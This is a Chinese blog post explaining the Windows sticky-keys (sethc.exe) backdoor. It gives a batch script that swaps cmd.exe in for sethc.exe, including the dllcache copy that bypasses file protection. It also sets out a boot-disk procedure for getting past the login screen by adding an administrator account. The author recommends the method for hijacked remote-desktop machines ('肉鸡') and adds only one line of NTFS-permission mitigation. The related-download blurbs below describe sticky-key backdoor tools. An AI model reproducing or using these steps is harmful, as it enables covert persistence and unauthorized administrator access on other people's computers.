`
icarusli
  • 浏览: 535676 次
  • 性别: Icon_minigender_1
  • 来自: 广州
社区版块
存档分类
最新评论

粘滞键漏洞

阅读更多

粘滞键漏洞,按5下shift后,windows就执行了system32下的sethc.exe

Windows的粘滞键。是按5下shift后,windows就执行了system32下的sethc.exe。即使
在3389中,都可以弹出!!
它本来是为不方便按组合键的人设计的。 如果我们把那个sethc.exe替换成我们想要的其它文件,比如说cmd.exe,那么就可以用cmd命令了.
其实写的批处理就可以解决了 又不麻烦

@echo off
del /q %systemroot%\system32\dllcache\sethc.exe
del /q %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe
我把它保存为5shift.bat。当我们运行它的时候,sethc.exe 就被换成了改了名的cmd.exe了。
可能由于cmd也是系统文件,所以替换是并没有弹出文件保护。呵呵。

个人感觉这个后门非常实用(特别是3389肉鸡!)。哪个管理员会考虑到这种后门呢

然后你就可以创建用户了
net user [UserName [Password | *] [options] [/domain]
net user [UserName {Password | *} /add [options] [/domain]
net user [UserName [/delete] [/domain]

[color=Red][b]把sethc.exe文件的NTFS权限设置一下就安全了.[/b][/color]

用shift键破解windows的登录密码.

首先用DOS盘启动.然后转到c:\windows\system32\下面.输入如下命令:

copy sethc.exe sethc2.exe 备份粘滞键文件

copy cmd.exe sethc.exe 用cmd.exe覆盖sethc.exe

然后重启.当需要输入密码的时候按5下shift就打开cmd窗口,然后输入如下密码:

net user admin admin /add 添加admin用户,密码是admin

net localgroup administrators admin /add 提升为超级管理员
分享到:
评论

相关推荐

    粘滞键后门-自动创建-批处理版(axun)

    然而,安全漏洞往往潜藏于意想不到的地方,粘滞键也不例外。攻击者可以通过编写特定的批处理脚本(如压缩包中的"粘滞键后门.bat"),利用粘滞键功能来创建一个不易被察觉的后门。这种后门可能允许远程访问、执行任意...

    一个delphi和C写的粘滞键后门

    标题 "一个delphi和C写的粘滞键后门" 提示了这个压缩包包含的是一个用 Delphi 和 C 语言编写的恶意软件样本,具体来说是一个利用“粘滞键”功能的后门程序。粘滞键是 Windows 操作系统中的一个辅助功能,允许用户在...

    调用者:渗透测试实用程序

    9. **粘滞键漏洞**:粘滞键漏洞(Sticky Keys)是一种旧的利用方式,通过发送特定序列的按键可以绕过用户交互,达到远程执行代码的目的。 10. **访问令牌操纵**:攻击者可能会篡改或复制访问令牌,以获得更高的权限...

    34.Windows系统漏洞之5次Shift漏洞启动计算机1

    在Windows系统中,按住Shift键五次会触发“粘滞键”功能,这是一个辅助功能,旨在帮助用户连续按下同一键。然而,这个功能可以被恶意利用,通过特定的命令序列,攻击者可以打开命令提示符(CMD)或者PowerShell,从而...

    shift后门制作.txt

    “shift后门”特指一种利用Windows操作系统中的辅助功能——“粘滞键”(Sticky Keys)创建后门的方法。正常情况下,当用户按下Shift键五次时,Windows会弹出一个对话框询问是否启用粘滞键。然而,通过修改特定的...

    后门sethc 带输入密码的 后门sethc

    在Windows操作系统中,"sethc"是一个合法存在的辅助工具,用于在系统启动时为物理键盘损坏的用户启用粘滞键功能。然而,由于其特殊性质,"sethc"经常被黑客利用,创建带输入密码的后门,以隐蔽地控制系统。 "sethc....

    服务器后门(cmd使用)

    这里将`explorer.exe`(Windows资源管理器)复制到`sethc.exe`的位置,`sethc.exe`是Windows中的粘滞键实用程序,通常用于辅助功能。通过替换`sethc.exe`,攻击者可以在不引起怀疑的情况下运行自定义代码。 #### ...

    网吧维护技术资料 合集

    2893 网吧维护\资料\xp实用技巧\搞定Windows XP鲜为人知的漏洞.txt 1487 网吧维护\资料\xp实用技巧\活用XP安全模式.txt 1413 网吧维护\资料\xp实用技巧\消除WindowsXP中的复制乱码 .txt 4825 网吧维护\资料\xp实用...

Global site tag (gtag.js) - Google Analytics